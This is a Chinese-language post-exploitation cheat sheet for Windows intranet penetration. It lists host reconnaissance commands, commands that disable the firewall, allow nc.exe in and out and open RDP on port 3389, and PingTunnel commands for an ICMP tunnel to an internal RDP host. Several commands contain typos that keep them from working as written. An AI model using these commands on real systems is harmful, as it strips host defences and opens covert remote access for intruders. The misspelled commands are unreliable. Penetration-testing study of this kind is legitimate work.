基础信息收集

查询网络配置信息

ipconfig /all
1.png

查询操作系统及软件的信息

systeminfo | findstr /B /C:"OS Name" /C:"OS version"

查看系统体系结构

echo %PROCESSOR_ARCHITECRURE%

查看安装的软件及版本、路径

wmic product get name,version
利用powershell命令 收集软件的版本信息
powershell "Get-WmiObject -class Win32_Product |Select-Object -Property name,version"
2.png

查询本机服务信息

wmic service list brief3.png

查询进程列表

tasklist

查看进程信息

wmic process list brief

查看启动程序信息

wmic startup get command,caption

查看计划任务

schtasks /query /fo LIST /v

查看主机开机时间

net statistics workstation

查询用户列表

net user
获取本地管理员信息
net localgroup administrators
查看当前在线用户
query user || qwinsta

列出或断开本地计算机与所连接的客户端之间的会话

net session

查询端口列表

netstat -ano

查看补丁列表

systeminfo
wmic qfe get Caption,Description,HotFixID,InstalledOn

查询本机共享列表

net share
wmic share get name,path,status

查询路由表及所有可用接口的ARP缓存表

route print
arp -a

查询防火墙相关配置

关闭防火墙
windows 2003 以前的版本
netsh firewall set opmode disable
windows 2003 之后的版本
netsh advfirewall set allprofiles state off
查看配置
netsh firewall show config
修改配置
netsh firewall add allowedprogram c:\nc.exe "allow nc" enable
windows 2003之后的版本
netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="C: \nc.exe"
允许指定程序退出
netsh advfirewall firewall add rule name="Allow nc" dir=out action=allow program="C: \nc.exe"
允许3389 放行
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
自定义防火墙日志的存储文件
netsh advfirewall ser currentprofile logging filename"C:\windows\]temp\fw.log"

查看代理配置情况

reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
查询并开启远程连接服务
查看远程连接端口
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNumber
在windows 2003 开启3389
wmic path win32_terminalservicesetting where (__CLASS != "") call setallowsconnections 1
在windows 2008和windows 2012开启3389
wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicrsetting where (__CLASS != "") call steallowscinnections 1
wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where ("Terminal='RD[-Tcp'") call seruserauthenticationrequired 1
reg add “HKLM\SYSTEM\CURRENT\CONTROLSER\CONTROL\TREMINAL SERVER” /v
fSingleSessionPerUser /t REG_DWORD /d 0 /f

隐藏通信隧道技术

何为隧道?

  1. **一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方进行通信。当被封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送的相应的服务器上。**

ICMP协议

ping ip

TCP协议

nc ip

HTTP协议

curl ip

DNS协议

nslookup(windows)和dig(Linux)

网络层隧道技术

IPv6隧道

通过IPv4隧道传送IPv6数据报文的技术。为了在IPv4海洋中传递IPv6信息,可以将IPv4作为隧道载体,将IPv6报文整体封装在IPv4数据报文中,使IPv6报文能够穿过IPv4海洋,到达另一个IPv6小岛。

工作过程

  1. 节点A向节点B发送IPv6报文,首先需要在节点A和B之间建立一条隧道
  2. 节点A将IPv6报文封装在以节点B的IPv4地址为目的地址、以为自己的IPv4地址为源地址的IPv4报文,发往IPv4海洋
  3. 在IPv4海洋中,这个报文和普通的IPv4报文一样,经过IPv4的转发到达节点B
  4. 节点B收到后,将IPv4报文还原成IPv6报文

    ICMP隧道

    简单、使用,是一个比较特殊的协议。在一般的通信协议中,如果两台设备进行通信,肯定需要开放端口,而在ICMP写一下就不需要。最常见的ICMP信息为ping命令的回复。

    PingTunnel

    需要在建立ICMP隧道的两台机器同时安装此工具
    在服务器执行3
    ptunnel -x huahua
    在客户端(vps)执行
    ptunnel -p 隧道另一台计算机 -lp 1080 -da 内网站另一台机器ip -dp 3389 -x huahua
    -x 指定ICMP隧道连接的验证密码
    -lp 监听的本地TCP端口
    -da 要转发的目标机器的ip地址
    -dp 同上TCP端口
    -p ICMP隧道另一端的机器的ip地址